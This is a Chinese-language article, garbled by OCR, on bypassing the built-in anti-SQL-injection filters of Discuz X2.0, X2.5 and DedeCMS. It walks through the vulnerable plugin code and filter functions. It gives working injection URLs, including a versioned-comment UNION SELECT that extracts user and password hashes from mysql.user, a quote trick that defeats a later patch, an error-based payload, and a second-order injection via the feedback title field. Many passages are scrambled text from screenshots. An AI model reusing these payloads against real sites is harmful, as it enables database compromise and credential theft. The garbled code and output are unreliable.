幾種通用防注入程序繞過方法

1、幾種通用防注入程序繞過方法0X00前言目前主流的CMS系統(tǒng)當(dāng)中都會內(nèi)置一些防注入的程序，例如Discuz、dedeCMS等，本篇主要介紹繞過方法。0 X01 Discuz x2.0 防注入防注入原理這里以Discuz最近爆出的一個插件的注入漏洞為例，來詳細(xì)說明繞過方法。漏洞本身很簡單，存 在于/source/plugin/v63shop/config.inc.php中的第 29 行 getGoods 函數(shù)中，代碼如下所示1 fun cti on getGoods($id)$query= DB:query( select * from2 '.DB:table('v63_goods

2、' ). ' where 'id' =' .$id);$goods= DB:fetch($query);$goods'e ndtime2'=date( 'Y-m-d' ,$goods'endtime');$goods'price2'=$goods'price'if($goods'sort'=2)7$goods'e ndtime2'=date('Y-m-d891011121314151617H:i:s ',$goods'e

3、ndtime');$query= DB:query( “select * fromby id“.DB:table( v63_pm'). ” where gid= '$goodsid order desc “);$last= DB:fetch($query);if(is_array($last)$goods'price' =$last'chujia'$goods'uid' =$last'uid'$goods'username' =$last'username'$goods

4、9;pm' =$last;if(time()+600>$goods'endtime')$goods'endtime' =$lasttime+600;$goods'endtime2'=date( Y-m-d H:i:s ',$lasttime+600);18192021retur n$goods;- ?_GET qid' irtie = time ():5Jfname -();22觸發(fā)漏洞的入口點在 /source/plugin/v63shop/goods.inc.php中的第6行和第8行，如圖所示：num '

5、 t-ype1 t Igoodslnlot1 sort * /i£ (Sgcodslnio1ypeH1 -*1) Iquery rB: : q.uer y ( seLeet * frem rF_Dfi: : table dl2hl 二 DB:fecch(Squery);F面可以構(gòu)造如下請 求觸發(fā)漏洞了，如圖所示: L?|d UKL；Split UKLi=rZnLblt Fx< Jtlft 廠 2ntl>L« K«f«rrtrDtscuz! Database ErrorTheb占$ eniy-ounttred a problem. "

6、 i weEnor messages:» Type宜詢話乜ffl諛* 1064 Yov have an error ir your SQL syn 七 e*; clieck theHi at corretp&n ds to y<?ur M ySQL serverversion for the righttn ne near V 寸t hne 1Querr select * from Yi3_flcod? where id =1Program Line ;9 plug in .ph p (i h ci ud e ；une： 0008 so u reeV*ld gi nv&

7、amp;3 she rg and 5. inc. l>hpg etCd ods)< Linb : 009sourcsplu9inv635hopE>anfTg.inc»phpfDB:query)不過程序內(nèi)置了一個_do_query_safe函數(shù)用來防注入，如圖所示0!b>ai URLhttj /I AC Alh OEl/dl ECUZZ/plueii IL 曲Jbt TJS1*E>ac"iafa1Enc«iateg豪 1 ml 12 wa Q-& 1*1 «c IL L 2r 3ri 4.5, 6j e«m&

8、#171;t (uMr, 0k23 p«s«orB, 9r 10, 113i 13 &cm wy譏 q>«r廠 Etbl-4 Pg+ d.E 廠備Xnifrr *rDiwt:uz! Oatabase ErrorTtie臼罰®b臺且電h占名e neo unite! recEproblem.討；戸尸心亍Error mu注羽曲；-Rrpe 2*1旬左寶盛肘* (Query seEsizt " frorri v63_goods where id and 1-2 untoni selectDOftcattli£旦幣OjcZ3sms

9、ord.9.10.11B12rl3 from m>石口1userpifogrrn EUPigz; Lina： 0043pIugin.php(indude)+ (Un韓 00OsJsowircepl*jginv6-55Fnfcpjgcods.inic.hpod5) Une: O029$ourcepluginv43shopc口桶中尺為比口掃：巴11上仃 iLine： 55osdrce'sclassclre phpfDB:chectquerr>這里跟蹤一下_do_query_safe()函數(shù)的執(zhí)行，它會對以下關(guān)鍵字做過濾，如圖所示:?三令 dfwetionArr»y &

10、amp;律0 1+ £* 1GtrjLdg.3)蛀d.0 5(stri ng- 4) churIE *Krrfcy 4 J鼻0(itring： 11)4 1Csiri m： 12) i為鈕hap&L*4 2(striel" 1L J miloihsclect令37) (3.«l«elG * Jnotailrry 514 0SriBC藺 /»* 12) /* 2Ci+nne 1) >1Cs+rine：2) 4ts+rini： I)A "I.!1因為我們的url中出現(xiàn)了 union select,所以會被過濾掉。繞過方法這里

11、利用Mysql的一個特性繞過_do_query_safe 函數(shù)過濾，提交如下 url :http:/localhost/discuzx2/plug in. php?id=v63shop:goods&pac= info&gid=1and 1=2 union /*!50000select*/1 1,2,3,4,5,6,co ncat(user,0x 23,password),8,9,10,11,12,13 frommysql.user這里我們跟蹤一下，繞過的具體過程。它會將1*1中間的內(nèi)容去掉，然后保存在$clean變量中，其值為select * from pre_v63_good

12、s where 'id'1 =1 and 1=2 union /*/1,2,3,4,5,6,c on cat(user,0x 23,password),8,9,10 ,11,12,13 frommysql.user再進一步跟蹤，它會 將/*/也去掉，然對$clean變量做過濾，如圖所示fcrlean jpreg seplue ("*/ a-z 口-m.)-I " i* is"szt tc levee (Sc：l.ebn) ;Lf(S_COMTIC aiuLLucte 11 3clean str_replace ('<*/',

13、1 r Sclean:此時$clean值，如圖所示Volm0 Jsq.1lEtnng： 143) selecrt * from pre_yfi3_ 11 田 Q S.COHFIGArr ay 6* Jel*4TY(stritig； 9S) s*L*ct*froihpr*v63 gftod|(s-tring： 0)0 $1 ill<int) K34 £iat) H30 Satr(strinc 0 rUILl(stEing:95J二1selectIrompre v6 goodsvhereidlandlZunionlZ3456ccncat(userOx23pas swatd) S91

14、D1112 13f此時$clean變量中不在含有危險字符串，繞過_do_query_safe函數(shù)過濾，成功注入，截圖如下：Http /ImsIIiqs8!/4iificiirKS7plucini ?s d-*63 ihor goodsipai»f cig151 uid 1=2* wiig J? I SOGOOtelst*“上2電 5j 6, eBcat. Ins er, 0x23, paiwsrdlJ, 6.9. LOj, llr 12,13 fr» itraL. userURLSjlit IFBLI Enable foil dtlk 廠fitfonrer禮庫陥時結(jié)束商閭：

15、1971X1-010 X02 Discuz X2.5 防注入防注入原理Discuz X2.5版修改了防注入函數(shù)的代碼，在/config/config_global.php中有如下代碼，如圖所示S_config * security* 1 querysafe1 f T 0* = ' / * 15_configT security1 TquerysfeTfdnot f Tlf » T */1 S_configT securityT JT que rysafe11dnot»TT 21 T #r; 5_configT security * T qurysafe1Tdnot&

16、#187;Tf 3 * = T-1 S_config Security7 *qu«rysafe* 'dnote* f 4* = T j S_conf iq * b ecurityf * querysafe1 f dlikehei：T = 1;$_on£ig T security T 1 que rysa.Ee'1 *a£ullnot«T = T 0 T <這里 $_config'security''querysafe''afullnote'默認(rèn)被設(shè)置為 0，重點關(guān)注這一點這里跟蹤一下失

17、敗的原因，如圖所示：pj i' inc.cenfiin-e phpphr 卜 Ihrpdk;cdse '* * ：if (entityk> it. subatr (Saql, Si, 3) » '1 (5marfc 工一 J:$亡丄tan , = SiraiEk;bredc£aul.t;hre aX;5c 1 an . $ jnaxk :'$ clean = ur&gretilaee i,r/ " a-eD-9 :r ,rl +/ is0-, rr, atrtoloiTEr i tlean 1 ;*LeT) - sel

18、ect f rottipr & v63 goocirG'riiT i dlfijidi3unLor,123456concBt (e此時觀察一下變量， 如圖所示：_do_query_safe($sql)函數(shù)會將/*/中的內(nèi)容去掉，然后存到 $clean中, $卻Lstrizi：: 1-zE.I seie ct * fromds爭 $cl«UkGtring 13) s«l«ct * from prds* £ ft ark(strizic 0)* £1 en(mt) 135Q Si(int) 135 £itrI) rU<

19、;str±ng:123j select * from pre v63 good3 where id. -1 tunon / */ lr2f3,r5, 6, concat (user,0x23 pesswo rd) ,6,910,1112,13 Iron* inysql. 口呂已匚因為前面提到 $_config'security''querysafe''afullnote'=' 0'所以這里不會替換 /*/ 為空,并且它在后面會判斷$clean中是否會出現(xiàn)“/*,”如圖所示：1444454 4 6ifif (is arra

20、y (seLf : : $aonf2.gr 1 dnote1 )f oreach ( e tjidnc>te1 ) as note 3447j 1 (stirpos ($c-Leanf $note) *1f alMS4 d Q：rcxirn *;T T j450JJr1*i51i452return 1;*所以注入失敗。繞過方法在Mysql當(dāng)中，定義變量用 字符，可以用set a= ' ab，來為變量賦值。這里為了合法的構(gòu)造出一個單引號，目的是為了讓sql正確，我們可以用 放入sql語句當(dāng)中，幫助我們繞過防注入程序檢查。這里利用如下方式繞 過_do_query_safe函數(shù)過濾，如

21、下所示:http:/localhost/discuz/plug in .php?id=v63shop:goods&pac=info&gid='' union select1 、' ',2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14frommysql.user這里跟蹤一下執(zhí)行的 過程，如圖所示:IPri r f-uriE't i on. d申 百址1aryC eql k I彳豹* str_i:epl«ce (erraJrt V- B ULJ m 1 ' >

22、; 細(xì)口 L” Fg " yif ijscrpoe4 J =" f J-se <41 #111 f Ore"“pgf 尊匚 f I f(Scrlaan prag rep Ivcb (B7 1 (.+7) 1 f a"p 1 s P Isq li :t else 1胡 ln - ln;這里有一個if判斷，重點看這句1 $clean= preg_replace( “/' (.+?) ' /s ” , ” ,$sql);它會將$sql中單引號引起來的字符串省略掉，所以我們可以 用繞過dede防住ids的思路, 利用1 ' '

23、; union select ' '這樣的方法，在下面 的過濾中省掉union select,這里跟蹤一下，如圖 所示: Ssql(string. 130 stlect * from prt_v63_coods where* Sela antxtrjng 111) select * frem pre_r63_goods wher&(str-iriff 01|I(3tring-! Ill) select T frein ptre v£3 goods where ' nd'yf2li3ffSl6f7t concat (host, 0x3a, use

24、r) 9 10, 11# 12 + 13 14 from mysql * user這樣便繞過了 _do_query_safe函數(shù)檢測，成功繞過防注入，如圖所示:L»id UB1DM呃話品訐皓兌襪記錄:C«n«oc不過后來Discuz官方發(fā)布了一個修復(fù)補丁，但并 沒用從根本上解決問題。官方的修復(fù)代碼 如下：hi741B4194204?1-v-it) !* CaJ.sc)(return *-3')加了一個判斷，過濾字符串中的，但是始終沒有修復(fù)根本問題，關(guān)鍵是上邊的那個if判斷會將單引號之間的內(nèi)容（包括單引號）替換為空，代碼如下if(strpos($sql,1

25、&&strpos($sql,preg_replace('/')= false &&strpos($sql,'-)=false) $clean=“/' (+?)' /s ”，” ,$sql);#') = false這里我只要稍做一下變換就可以讓字符消失，從而繞過它的過濾，利用如下所示:http /JI «cOhdd/dl9 EC«i/>l ogia tbpilvSSskof C«oJ.£If4.c=in£v4rt ' whiq-n t«l

26、71;c I 0 ' 23,. <1.5, 6. 7P tt QmikI, 0k3 uxtr) ,9p 10, 11, LZ 11 14 £r«* n戸譏 «.t«r廠 En.«bl« Fs.4 d«t« r Enftbl-t Rtftrrtrhttp:/localhost/discuz/plug in .php?id=v63shop:goods&pac=info&gid=' or”' union select 1 from (select count(*),conca

27、t(selectgroup1 database(),floor(rand(0)*2)afrom information_schema.tablesby a)b where '這里我引入了 ''用來隱藏第一個 字符，并將第一 個''替換為' ”'這樣便可以替換掉第二個，這里我們跟蹤一下代碼，如圖 所示：粧01. s4r iei： 188 ! s ele ct.魚 £r«wherfl i 4= SdLe art(s/Lr ltLg： 421 s«JLee i 4- from pre_wHS3_gtod.s whe

28、re i A.G<r m<'0)U1(string:42 aelect * irom pre_v63_gDods where LidL 可以看到$clean變?yōu)? select * from pre_v63_goods where 'id成功繞過補丁，如圖 所示:Discuz? Database Errort 1062) Dupiic-at e-ntryfor key croup_.key'select fromwhere * i(T ar *'union 細(xì) 2ct 1 from (tQlact count(*) pConatt (cfrladt

29、u£0if),flDDr(4,aninfoirniLiOn_scherni tahgroup tiy b uhire tj| ''PHD DebugNo.Ft 1電LineCode1pluainphp47i ncl ude (魅)2source/plugi n/v6Ishop/oods.inc.php8getGoods)3source/pliil n/v6 shop/conf i g.lnc.php29di£cu2_databa£e:que ry4£ource/c1a££/di scu2/di£ 匚u jd呂

30、 t 呂b呂 sw. php136db._dri ve-iqury不過這樣做的代價是 不能再使用union select 了，只能通過報錯獲取 數(shù)據(jù)。0 X03 DedeCMS 防注入防注入原理'$cfg_ml->MD','0' ：0 ' ,'$feedbacktype','$face','$msg');這里我也以最近熱點 分析的 dedeCMS feedback.php 注入漏洞為例，分析如何繞過其防注 入系統(tǒng)。不過在這之 前，還得先提一下這個漏洞。漏洞存在于 /plus/feedback.php

31、中的第 244 行，代碼如下所示1 <?php2 if($comtype = 'comments') 34 $arctitle = addslashes($title);$typeid = intval($typeid);$ischeck = intval($ischeck);$feedbacktype = preg_replace("#F0-9a-7 z#i", "", $feedbacktype);if($msg!="")$inquery = "INSERT INTO10 '#_feedba

32、ck'('aid','typeid','username','arctitle','ip','ischeck','dtime', 'mid','bad','good','ftype','face','msg')VALUES('$aid','$typeid','$username','$arctitle','$i

33、p','$ischeck','$dtime'1112131415161718192021$rs = $dsql->ExecuteN on eQuery($ inq uery); if(!$rs)ShowMsg('發(fā)表評論錯誤! ','-1 ');/echo $dsql->GetError();exit();/ 引用回復(fù)elseif($comtype = 'reply')22 $row = $dsql->GetOne("SELECT * FROM'#_feedback

34、9; WHERE23 id ='$fid'");2425$aid =$row'aid'26$msg= $quotemsg.$msg;$arctitle= $row'arctitle'27$msg= HtmlReplace($msg, 2);$inquery = "INSERT INTO'#_feedback'('aid','typeid','username','arctitle','ip','ischeck',&#

35、39;2 dtime','mid','bad','good','ftype','face','msg') VALUES8 ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '$cfg_ml->MD','0' ,'0 ' ,'$feed

36、backtype','$face','$msg')"29$dsql->ExecuteNoneQuery($inquery);30 這里 $title 變量未初始化，所以 $title 可以作為可控變量，所以我們可以進一步控制$arctitle 。跟 蹤發(fā)現(xiàn) $arctitle 被直接帶入 SQL 語句當(dāng)中，但是這里執(zhí)行的 INSERT 語 句入庫 之后會將前面 addslashes 轉(zhuǎn) 義的單引號在會員還原回去。進一步跟蹤下面 的代碼，在第 268 行，如下所示$row = $dsql->GetOne( “SELECT* FROM#

37、_feedback' WHEREd1 ='$fid '”);$arctitle= $row'arctitle'這里的查詢 #_feedback 表 正式上面 INSERT 的那個表， arctitle 字段取出來 放到$arctitle 變量當(dāng)中，繼續(xù)跟蹤到第 273 行，這下豁然開朗了，$inquery = “INSERTINTO'#_feedback'('aid','typeid','usern ame','arctitle','ip','isch

38、eck',' dtime','mid','bad','good','ftype','face','msg')1VALUES($aid ','$typeid ','$username ','$arctitle ','$ip ','$ischeck ','$ dtime ','$cfg_ml ->MD , ' O', '0' , &

39、#39; $feedbacktype ' ,'$face ' ,'$msg ') ”；這里 $arctitle 變量未作任何處理，就丟進了 SQL 語句當(dāng)中，由于我們可以控制 $title ，雖然 $arctitle 是被 addslashes 函 數(shù)處理過的數(shù)據(jù)，但是被 INSERT 到數(shù)據(jù)庫中又被還原了，所 以綜合起來這就造成 了二次注入漏洞。但是這里如何利用呢 ，通過跟蹤代碼發(fā)現(xiàn)，整個 dede 在 整個過程中始終沒有輸出信息， 所 以我們無法通過構(gòu) 造公式報錯來獲取數(shù)據(jù)，但是進一步分析 代碼發(fā)現(xiàn) #_feedback 表 當(dāng)中 的 msg 字段會

40、 被輸出。由于 $arctitle 變量是可控的，所以我們可 以通過構(gòu)造 SQL 語句， 將我 們要執(zhí)行的代碼 插入到 msg 字 段當(dāng)中，這樣便可以輸出執(zhí)行的內(nèi)容了。繞過方法眾所周知， dedeCMS 內(nèi)置了一個 CheckSql() 函 數(shù)用來防注入，它是 8Osec 開發(fā)的通用防注 入 ids 程序，每當(dāng)執(zhí)行 sql 之前都要用它來檢查一遍。其 代碼如下所示：1 functionCheckSql($db_string,$querytype= ' select ')global$cfg_cookie_encode;4567891011121314015$clean= ”;$

41、error= ”;$old_pos= 0;$pos= -1;$log_file=DEDEINC'. /./data/ ' .md5($cfg_cookie_encode). '_safe.txt$userIP= GetIP();$getUrl= GetCurUrl();/ 如果是普通查詢語句，直接過濾一些特殊語法if($querytype= 'select ')$notallow仁 ” F0-9a-z._-1,(u nio n|sleep|be nchmark|load_file|outfile)F0-9a-z.-1,01617$notallow2= “

42、- |/* ”；18if(preg_match( “/” .$notallow1. ” /i ” ,$db_string)19020fputs(fopen($log_file,db_string|SelectBreakrn ” );'a+'), ” $userIP|$getUrl|$exit( “ vfont size= '5' color= ' red' >Safe Alert:21 Request Error step 1 !</font> ” );22 23/完整的SQL檢查242526272829303132333435

43、3637while(TRUE)$pos=strpos($db_string, '”,$pos+ 1);if($pos= FALSE)break;$clean.=substr($db_string,$old_pos,$pos-$old_pos);while(TRUE)$pos1=strpos($db_string, '”,$pos+ 1);$pos2=strpos($db_string, '',$pos+ 1);383940414243444546474849if($pos1= FALSE)break;elseif($pos2= FALSE |$pos2>$

44、pos1)$pos=$pos1;break;$pos=$pos2+ 1;$clean.= '$s$'$old_pos=$pos+ 1;$clean.=substr($db_string,$old_pos);s+s'),array($clean= trim(strtolower(preg_replace(array( ),$clean);/ 老版本的 Mysql 并不支持 union ，常用的程序里也不使 用 union ，但是一些黑客使用它，所以檢 查它if(strpos($clean,'union ') != FALSE &&preg_

45、match( (A|Aa -z)union($|Fa-z)s' ,$clean) != 0)$fail= TRUE;50515253545556575859$error= ”union detect/發(fā)布版本的程序可能比較少包括-,#這樣的注釋,使用它們elseif(strpos($clean,'/* ')> 2 |strpos($clean,!= FALSE |strpos($clean,'#') != FALSE)但是黑客經(jīng)常-')$fail= TRUE;$error= ” comment detect/ 這些函數(shù)不會被使用,但是黑客會

46、用它來操作文件, 據(jù)庫down掉數(shù)elseif(strpos($clean, 'sleep ') != FALSE &&606162636465666768697071727374757677787980preg_match( (A|Aa -z)sleep($|Fa-z)s' ,$clean)!= 0)$fail= TRUE;$error= ”slown down detectelseif(strpos($clean,benchmark')!= FALSE &&,$clean) != 0)preg_match( (A|Aa -z)

47、benchmark($|Aa-z)s$fail= TRUE;$error= ”slown down detect elseif(strpos($clean, ' load_file ')!= FALSE &&,$clean) != 0)preg_match( (A|Aa -z)load_file($|Aa-z)s$fail= TRUE;$error= ” filefun detect ”;elseif(strpos($clean,'into outfile ')!= FALSE &&preg_match( (A|Aa -z)int

48、os+outfile($|Fa-z)s' ,$clean) != 0)$fail= TRUE;$error= ”file fun detect ”;/老版本的MYSQ不支持子查詢，我們的程序里可能也用得少，但8182838485868788899091是黑客可以使用它來查詢數(shù)據(jù)庫敏感信息92elseif(preg_match( (F)*?selects' ,$clean)!= 0)9394$fail= TRUE;95$error= ”sub select detect ”;9697if(!empty($fail)9809fputs(fopen($log_file,' a

49、+' ), ”$userIP|$getUrl|$db_9 string|$errorrn ” );exit( “vfont size= '5' color= ' red' >Safe Alert: 100Request Error step 2!</font> ”);else101102103104return$db_stri ng;105106 但通過跟蹤這段代碼 發(fā)現(xiàn)，它有個特征就是會將兩個單引號之間的內(nèi)容用$s$替換，例如'select會被替換為$s$，這里用兩個 、'包含敏感字，這樣 $clean變量中就不會出現(xiàn)

50、敏感 字，從而繞過CheckSql()函數(shù)檢測。這里可以設(shè)置title為如下代碼，一方面繞過 ids防注入代碼檢測，另一 方面加一個#注釋 掉后面的代碼，但是 還要做一下變形，就是這個 char(' ' '了。因為#_feedback的所 有字段都被設(shè)置為 NOT NULL,而' '是一個變量，默認(rèn)為 NULL，直接插入 ' '的話會 報錯，所以需要以char(' ' '的方法轉(zhuǎn)換一下。1 ,char(' 被 '),1,1,1,1,1,1,1,(SELECTuser()#,(1.跟蹤代碼，如圖所示I

51、T" V«11E1«J(Etiiici：29l) IJtSElT UETQdJbclc ( ud. , wew ,? ip , 1 xch.* JTitrytrptlpdatetit口 y： mH KMIr&urtstr 1 ai!90Q tTflTlJ de<Lf £«-ficLL«clk !A-.電it 8 usAmkni- ( ucki4.J.c- 、 i p , 1 -s0 Strrtr(Ltri3LC：OUp*> EflCEJs 曹(itrinc W D7fEB/4«dtnT5 7/includ

52、t/.用譏陽躅価號ULMT.nf*. ixt(EtriSH5；：9J I2T 0 0. 1(strBJi<；29) /Jf-ltcfBsIB T/plw/fteJbtck. pkp fpOEl(lm) raijJ 2JTNSFRT HTTOdeflr- retHjack：' ( am * c ypeiijusernftine r arctlc 1«' ip . isch#cK ” ilc lrn& VALUESr|a«rIsl, tatuIat<如下SQL語句INSERTINTO 'dede_feedback'('

53、aid','typeid','username','arctitle','ip、,'ischeck','dtime','mid','bad','good','ftype','face','msg')1客，char(' '、),1,1,1,1,1,1,1,(SELECT ，, ' 1，, ' 1364401789',VALUES(' 1，, ' 1，,'游 user()#,(1,','0，, ' 0，, ' 0 ' , ' feedback','!,' genxor');被替換為了insertinto 'dede_feedback'('aid','typeid','username','arctitle','ip'